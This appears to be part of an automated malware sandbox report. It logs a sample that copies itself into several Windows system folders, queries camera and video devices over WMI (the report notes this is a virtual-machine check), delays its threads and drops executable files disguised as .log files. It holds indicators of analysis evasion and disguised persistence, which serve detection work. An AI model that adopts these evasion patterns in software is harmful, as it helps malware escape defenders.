Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\QMT2731i8k.exe	Memory allocated: 23D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Memory allocated: 1A660000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Memory allocated: A10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Memory allocated: 1A850000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Memory allocated: 6F0000 memory reserve \| memory write watch
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Memory allocated: 1A460000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Memory allocated: 16D0000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Memory allocated: 1B220000 memory reserve \| memory write watch
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Memory allocated: 1500000 memory reserve \| memory write watch
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Memory allocated: 1B030000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Memory allocated: 1040000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Memory allocated: 1ADA0000 memory reserve \| memory write watch
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Memory allocated: A40000 memory reserve \| memory write watch
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Memory allocated: 1A860000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Memory allocated: 1340000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Memory allocated: 1B030000 memory reserve \| memory write watch
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Memory allocated: 2DB0000 memory reserve \| memory write watch
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Memory allocated: 1AE70000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Memory allocated: 750000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Memory allocated: 1A450000 memory reserve \| memory write watch
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Memory allocated: 7A0000 memory reserve \| memory write watch
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Memory allocated: 1A2D0000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Memory allocated: C20000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Memory allocated: 1AA40000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\QMT2731i8k.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 599843	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 3600000	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 598920	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 598422	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 597922	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 597796	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 597343	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 597093	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 596312	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 595810	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 595672	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 595140	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 594906	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 594390	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 593500	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 593250	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 592843	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 592406	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 592062	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 591625	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 590678	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 590359	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 590098	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 589593	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 589312	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 588890	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 588625	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 587905	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 587734	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 587406	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 587047	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 586859	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 586631	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 586515	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 586354	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 586212	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 586093	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 585969	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 585838	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 585673	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 585307	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 585093	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 584982	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 584875	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 584765	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 584650	Jump to behavior
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Window / User API: threadDelayed 8015			Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Window / User API: threadDelayed 1548			Jump to behavior

Source: C:\Users\user\Desktop\QMT2731i8k.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\PDeJzYJR.log	Jump to dropped file
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\kfyxwSYJ.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\zBjMJrtf.log	Jump to dropped file
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\YLzRFcIi.log	Jump to dropped file
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\EPzTPNOj.log	Jump to dropped file
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ZmxZjBOz.log	Jump to dropped file
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\GZVUPftk.log	Jump to dropped file
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\hpHHpWYQ.log	Jump to dropped file
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\TtUAGVJK.log	Jump to dropped file
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\WBdQFKdi.log	Jump to dropped file

Source: C:\Users\user\Desktop\QMT2731i8k.exe TID: 7524	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7856	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -599843s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7980	Thread sleep time: -28800000s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -598920s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -598422s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -598140s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -597922s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -597796s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -597547s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -597343s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -597093s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -596312s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -596000s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -595810s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -595672s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -595453s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -595140s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -594906s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -594390s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -593500s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -593250s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -592843s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -592406s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -592062s >= -30000s	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe TID: 7996	Thread sleep time: -591625s >= -30000s	Jump to behavior
